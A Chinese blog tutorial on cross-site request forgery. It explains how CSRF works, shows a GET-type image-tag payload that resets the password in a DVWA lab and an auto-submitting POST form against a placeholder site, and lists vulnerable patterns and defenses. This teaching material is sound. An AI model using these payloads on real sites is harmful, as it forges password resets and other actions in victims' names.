【渗透测试基础】跨站请求伪造CSRF

已于 2022-12-02 09:38:13 修改
阅读量178 收藏
点赞数
分类专栏: web安全 文章标签: csrf
于 2022-12-02 01:04:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/javaEE_zero/article/details/128125503
版权

01 简介 

CSRF(Cross-Site request Forgery)跨站请求伪造,它是一种挟持用户在当前已登录的web应用程序上执行非本意操作的方法。

 

过程描述:

  1.  用户通过浏览器访问并登录受信任网站A。
  2. 网站A验证通过后,返回cookie信息给浏览器。
  3. 用户在未登出网站A时,访问了恶意网站B。
  4. 恶意网站B返回给用户浏览器包含恶意请求网站A的代码。
  5. 在用户不知道的情况下,用户浏览器携带着步骤2的cookie,访问了网站A,完成攻击。

分析:http协议是无状态的,通过cokies记录会话信息,用户登录网站后,浏览器爆粗cookies信息。再次访问网站时,浏览器会将cookies附带在请求中。且接口只检查cookies信息,无法区分是否用户主动发起的请求。

 02 危害

添加账号

重置密码

任意发帖

……

03 示例

GET型

以dvwa靶场(192.168.77.100)get型csrf为例:

  1. 构造 payload 
    <html>
    <body>
        <img src="http://192.168.77.100/dvwa/vulnerabilities/csrf/?password_new=admin123&password_conf=admin123&Change=%E6%94%B9%E5%8F%98" />
    </body>
</html>
  2. 发送恶意链接(http://192.168.77.130/1.html)给用户诱导用户点击
  3. 模拟用户访问http://192.168.77.130/1.html,携带用户cookie,执行了重置密码操作。如下:
  4. dvwa密码已被重置为admin123

 POST型

需要构造form表单,在网页加载时自动提交,如下:

<html>
<body>
<form action="http://a.com/resetpasswd" method="post">
<input type="hidden" name="user" value="xiaoming" />
<input type="hidden" name="password" value="123456" />
<script>documnet.forms[0].submit()</script>
</form>
</body>
</html>

04 漏洞点

  1. 请求没有refer,token字段,即服务器不判断来源,常常存在csrf。
  2. 有refer,token字段,但是删除这两个字段仍然可以请求成功,说明存在csrf漏洞。

04 防御措施

  1. 检查referer,确认来源可信
  2. 添加token,为接口生成随机token,定义失效时间,在合法请求中带上toke

05 问题

实际渗透测试过程中,发现Edge和chrome并没有携带A网站的cookie信息,原因是受浏览器同源策略的限制,非同源网站无法获取cookie信息,若解决该问题需要解决跨域问题。可参照https://www.cnblogs.com/snowie/p/15044091.html

^^_candice
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
论文研究-跨站请求伪造CSRF)攻击与防范技术研究 .pdf
08-23
跨站请求伪造CSRF)攻击与防范技术研究,刘雅楠,马兆丰,跨站请求伪造CSRF)攻击作为最严重的web漏洞威胁之一被列入了开放Web应用安全项目(OWASP)十大漏洞列表。该攻击具有很大隐蔽性和危
Joas 的 Web 渗透测试清单.pdf
10-06
* 设置 "SameSite" 属性,以防止跨站请求伪造 (CSRF) 攻击 * 限制 Cookies 的生命周期,以防止长时间存在的 Cookies 被泄露 二、加密和随机性 * 使用强加密算法和最新的密码库来保护 Cookies 中的敏感信息 * 使用...
(保姆级教学)跨站请求伪造漏洞
最新发布
m0_63436163的博客
04-19 1349
跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件、发消息、甚至财产操作:转账、购买商品等)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份认证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。
跨站请求伪造CSRF
weixin_33965305的博客
11-02 83
CSRF是Cross Site Request Forgery的缩写,乍一看和XSS差不多的样子,但是其原理正好相反,XSS是利用合法用户获取其信息,而CSRF伪造成合法用户发起请求。 在XSS危害——session劫持中我们提到了session原理,用户登录后会把登录信息存放在服务器,客户端有一个用户标识存在cookie中,只要用户不关闭浏览器或者退出登录,在其有效期内服务器就会把这个浏览器...
js----CSRF-跨站请求伪造攻击
weixin_34399060的博客
02-18 163
一.CSRF是什么?  CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么?  你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的...
【Web安全】跨站请求伪造CSRF
RexHa的博客
10-14 1104
大多数CSRF攻击发起时,使用的HTML标签都是、、等带src属性的标签,这类标签只能发起一次Get请求而不能发起Post请求,而对于很多网站的应用来说,一些重要操作未严格区分GET和POST,攻击者可以使用GET来请求表单的提交地址。黑客伪造一个假的页面,当用户访问该页面后,黑客就会利用你的身份向第三方站点发送一个恶意请求,从而达到某些目的,例如以你的名义发送邮件、发消息,将你卡里的钱转走,删除某篇博客文章等等。如果用户提交了表单,则应重新生成一个Token。
csrf 跨站请求伪造
weixin_45605313的博客
04-14 184
原理: 利用目标用户的合法身份,以目标用户的名义执行某些非法操作。强制终端用户在当前对其进行身份认证后的web应用程序上执行非本意操作(伪造更改状态请求,利用社工诱骗用户执行hacker选择的操作) 防御手段 1.二次认证 2.HTTP referer 3.token 4.HTTP自定义头 利用 无防御:POC(get) Referer认证: 修改文件名绕过认证 token认证: 利用b...
渗透测试初级面试题(二)
09-15
回答指出,XSS 是跨站脚本攻击,CSRF跨站请求伪造攻击,XXE 是 XML 外部实体注入攻击。这些攻击方式都可以导致严重的安全问题,需要采用相关的修复方式来防范。 问题 6 中讨论的是 3389 端口无法连接的几种情况...
CSRF的脚本,可以做测试使用.zip
05-28
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的网络安全漏洞,攻击者利用这种漏洞,诱使用户在不知情的情况下执行非预期的操作。这个压缩包文件包含的是一些用于测试和学习CSRF攻击的脚本。下面将...
渗透测试初学者资源 DVWA压缩包
12-23
DVWA的设计目的是提供一个安全漏洞的实战平台,涵盖了SQL注入、XSS(跨站脚本)、CSRF跨站请求伪造)等常见的Web应用安全问题。在安装和使用DVWA之前,你需要确保你的操作系统是Windows 7或更高版本,并且已经安装...
CSRF跨站请求伪造实例程序
11-07
一个php做的简单的银行管理系统,利用cookie值来达到跨站伪造请求的目的,最终造成银行账户余额被修改。
csrf跨站请求伪造简单示例
10-18
一个简单的csrf跨站请求伪造的示例,只有一个简单的表单提交功能.通过伪造表单提交,完成一个简单的钓鱼案例
跨站请求伪造-CSRF防护方法
03-12
跨站请求伪造-CSRF防护方法跨站请求伪造-CSRF防护方法
渗透测试面试题2019版_面试_渗透测试_
09-30
- **CSRF跨站请求伪造)**:利用用户的登录状态执行非授权操作。 - **命令注入**:在输入字段中插入恶意命令,执行系统命令。 - **文件包含漏洞**:通过改变包含的文件路径,加载并执行服务器上的任意文件。 4...
CSRF-跨站请求伪造
TPH_BETTER.的博客
04-01 231
转自:https://blog.csdn.net/yun_ld/article/details/100048967 CSRF攻击全称为:Cross-site request forgery,直接翻译为:跨站请求伪造。直接看名称还是有点难以理解,容易跟XSS攻击搞混。在讲解如何防御之前,首先看看如何攻击,举个简单的攻击例子: 小明的悲惨遭遇 这一天,小明同学百无聊赖地刷着Gmail邮件。大部分都是没营养的通知、验证码、聊天记录之类。但有一封邮件引起了小明的注意:甩卖比特币,一个只要998!! 聪明的小明当然知
关于 CSRF跨站请求伪造
辉小鱼的博客
09-09 321
攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求。. 利用受害者在被攻击网站已经获取的注册凭证,绕过后台的用户验证,达到冒充用户对被攻击的网站执行某项操作的目的。
跨站请求伪造CSRF测试
无极低码
03-30 316
创建一个恶意网页或应用程序,其中包含指向目标API端点的请求,这些请求在用户访问恶意页面时自动执行。请求中应包含所有必要的认证信息,如Cookie、Token或会话ID,这些信息通常由用户的浏览器自动发送。利用自动化工具,如Burp Suite的CSRF Scanner、OWASP ZAP等,可以帮助发现和验证CSRF漏洞。审查Web应用程序的所有API端点,特别是那些执行敏感操作的端点,如账户设置、资金转移、权限更改等。分析漏洞的严重性,考虑其对用户安全的潜在影响,并确定修复的优先级。
渗透测试-跨站请求伪造SSRF测试及防御方法
lza20001103的博客
04-28 866
跨站请求伪造SSRF及防御方法
渗透测试CSRF基础知识
07-23
- 合理使用身份验证:使用随机生成的 token 或验证码来防止跨站请求伪造。 - 检查 Referer 头部:检查请求中的 Referer 头部,确保请求是从合法的来源发起的。 - 添加自定义请求头部:在请求中添加自定义的头部...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值